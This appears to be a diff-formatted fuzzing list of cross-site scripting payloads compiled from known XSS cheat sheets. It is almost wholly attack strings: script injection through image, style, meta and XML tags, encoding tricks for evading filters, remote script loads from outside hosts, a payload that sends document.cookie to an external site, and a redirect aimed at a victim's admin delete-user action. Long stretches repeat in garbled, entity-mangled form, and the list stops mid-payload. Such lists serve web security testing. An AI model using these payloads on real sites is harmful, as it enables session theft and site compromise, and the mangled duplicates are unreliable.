HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt; +&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt; +&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt; +&lt;HTML xmlns:xss&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt; +&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;!--[if gte IE 4]&gt; +&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt; +&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt; +&lt;? echo(&apos;&lt;SCR)&apos;; +&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt; +&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt; +&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt; +&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt; +&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; +&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt; +&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; +&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt; +&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4- +\&quot;;alert(&apos;XSS&apos;);// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt; +&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt; +&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D; +perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out +perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out +&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js +&lt;SCRIPT SRC=//ha.ckers.org/.j&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot; +&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt; +&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt; +&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;SCRIPT&gt;a=/XSS/ +&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; +&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt; +&lt;/br style=a:expression(alert())&gt; +&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt; +&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt; +perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out +perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +';';;!--";<;XSS>;=&;{()} +<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; +<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +<;BASE HREF=";javascript:alert(';XSS';);//";>; +<;BGSOUND SRC=";javascript:alert(';XSS';);";>; +<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; +<;BODY ONLOAD=alert(';XSS';)>; +<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; +<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; +<;DIV STYLE=";width: expression(alert(';XSS';));";>; +<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; +<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; +<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=javascript:alert(';XSS';)>; +<;IMG DYNSRC=";javascript:alert(';XSS';);";>; +<;IMG LOWSRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser +exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); +<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS +<;IMG SRC=';vbscript:msgbox(";XSS";)';>; +<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; +<;IMG SRC=";livescript:[code]";>; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; +<;IMG SRC=";mocha:[code]";>; +<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; +<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; +<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; +a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d); +<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; +<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; +<;XSS STYLE=";xss:expression(alert(';XSS';))";>; +<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; +<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; +<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; +<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; +<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; +<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; +<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; +<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; +<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; +<;HTML xmlns:xss>; +<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; +<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; +<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; +<;HTML>;<;BODY>; +<;!--[if gte IE 4]>; +<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; +<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; +<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; +<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; +<;? echo(';<;SCR)';; +<;BR SIZE=";&;{alert(';XSS';)}";>; +<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; +<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; +<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; +<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; +<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; +<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; +<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; +<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; +<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- +\";;alert(';XSS';);// +<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; +<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; +<;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; +<;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D; +perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out +perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out +<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; +<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js +<;SCRIPT SRC=//ha.ckers.org/.j>; +<;IMG SRC=";javascript:alert(';XSS';)"; +<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; +<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; +<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; +<;SCRIPT>;a=/XSS/ +<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; +<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; +<;A HREF=";http://1113982867/";>;XSS<;/A>; +<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; +<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; +<;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; +<;A HREF=";//www.google.com/";>;XSS<;/A>; +<;A HREF=";//google";>;XSS<;/A>; +<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; +<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; +<;A HREF=";http://google.com/";>;XSS<;/A>; +<;A HREF=";http://www.google.com./";>;XSS<;/A>; +<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; +<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT 